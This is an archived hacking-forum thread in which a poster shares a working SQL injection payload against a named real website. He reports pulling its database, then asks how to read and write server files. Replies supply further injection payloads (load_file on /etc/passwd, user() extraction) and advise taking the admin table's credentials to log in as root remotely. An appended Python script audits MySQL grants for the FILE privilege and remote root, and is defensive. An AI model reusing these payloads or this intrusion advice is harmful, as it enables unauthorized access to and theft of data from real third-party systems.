Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
How to put a file with this SQL injection?
Posted by: 0xAsc11
Date: July 20, 2013 05:00AM

Hi all,

I found an SQLi here: http://www.leclubdesproprietaires.com/

With this POST data: login=nop") union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28;#&pass=nop

Fields 3 and 4 are visible in the site.

I got all the information that I want in the DB, but I can't write a local file (limited rights).

Concerning reading a file, this injection:
login=aaa") union select 1,2,load_file('/etc/passwd'),4,...27,28;#&pass=aaa returns NULL

How can I read or write a local file?

Thanks

Re: How to put a file with this SQL injection?
Posted by: hack2012
Date: July 26, 2013 05:13AM

login=nop") union select 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28;#&pass=nop

user = c1bc_cp_dba@localhost

It's not root.

There is no file_priv to load_file or into outfile...

So you must get the username and password from the admin table.

Re: How to put a file with this SQL injection?
Posted by: 0xAsc11
Date: July 26, 2013 06:53AM

Thanks for your answer,

If I found the root password, what is the SQL command to connect as root?

Re: How to put a file with this SQL injection?
Posted by: jammy99
Date: July 28, 2013 10:46PM

There is direct command to connect to MySQL on the server with root or any other user.

You can use any MySQL client, like sqlwave, to connect to the MySQL of any host.
But you can only connect if the server accepts remote connections.

Re: How to put a file with this SQL injection?
Posted by: hack2012
Date: July 30, 2013 02:40AM

If you found it, and the root user does not deny your IP, you can link it with an SQL client.

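The replies above turn on two settings a database administrator controls: whether the web application's account holds the global FILE privilege, and whether an administrative account accepts connections from non-local hosts. The following is an added example, not code from any post in this thread, that flags both conditions in `SHOW GRANTS` output; the account names and grant lines are constructed sample data.

```python
import re

# Matches MySQL 5.x ('user'@'host') and 8.x (`user`@`host`) SHOW GRANTS lines.
GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+"
    r"[`'](?P<user>[^`']*)[`']@[`'](?P<host>[^`']*)[`']",
    re.IGNORECASE,
)
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}

# Constructed sample: one line per row returned by SHOW GRANTS for each account.
SAMPLE_GRANTS = [
    "GRANT USAGE ON *.* TO 'app_rw'@'localhost'",
    "GRANT SELECT, INSERT, UPDATE, DELETE ON `shop`.* TO 'app_rw'@'localhost'",
    "GRANT SELECT, FILE ON *.* TO 'report'@'localhost'",
    "GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION",
    "GRANT ALL PRIVILEGES ON *.* TO `root`@`%` WITH GRANT OPTION",
]


def audit_grants(lines):
    """Return sorted (account, finding) pairs for risky global grants."""
    findings = set()
    for line in lines:
        m = GRANT_RE.match(line.strip())
        # FILE is a global privilege, so only ON *.* grants are relevant here.
        if not m or m.group("scope") != "*.*":
            continue
        privs = {p.strip().upper() for p in m.group("privs").split(",")}
        account = f"{m.group('user')}@{m.group('host')}"
        is_admin = "ALL PRIVILEGES" in privs or "ALL" in privs
        # FILE (explicit or via ALL) is what LOAD_FILE() and INTO OUTFILE require.
        if is_admin or "FILE" in privs:
            findings.add((account, "FILE"))
        # An all-privilege account whose host part is not local can log in remotely.
        if is_admin and m.group("host") not in LOCAL_HOSTS:
            findings.add((account, "REMOTE_ADMIN"))
    return sorted(findings)


if __name__ == "__main__":
    for account, finding in audit_grants(SAMPLE_GRANTS):
        print(f"{finding:13} {account}")
```

An account that only serves a web application should produce no findings: table-level privileges on its own schema are enough for it to work.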